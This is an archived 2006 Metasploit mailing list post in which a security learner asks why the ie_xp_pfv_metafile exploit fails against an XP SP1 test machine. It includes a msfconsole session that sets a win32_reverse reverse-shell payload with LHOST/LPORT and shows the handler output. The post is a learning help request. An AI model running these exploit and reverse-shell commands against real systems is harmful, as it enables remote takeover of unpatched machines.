Metasploit mailing list archives

ie_xp_pfv_metafile doesn't work


From: n-baraca at uniandes.edu.co (Nathalie Baracaldo Ángel)
Date: Wed, 1 Mar 2006 10:23:26 -0500

Hi

I'm learning about security  and I'm trying to use ie_xp_pfv_metafile, I don't
know what I'm doing wrong but it I can't access to the target(xp sp1), I have
no firewalls.

I would be grateful if someone can tell me what I'm doing wrong because I've
tried other exploits and playloads, but it never works. This is what happens:

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.100
LHOST -> 192.168.0.100
msf ie_xp_pfv_metafile(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.100:8080/
[*] HTTP Client connected from 192.168.0.101:1056, redirecting...
[*] Exiting Reverse Handler.
msf ie_xp_pfv_metafile(win32_reverse) >

Thanks!

Nathalie



Current thread: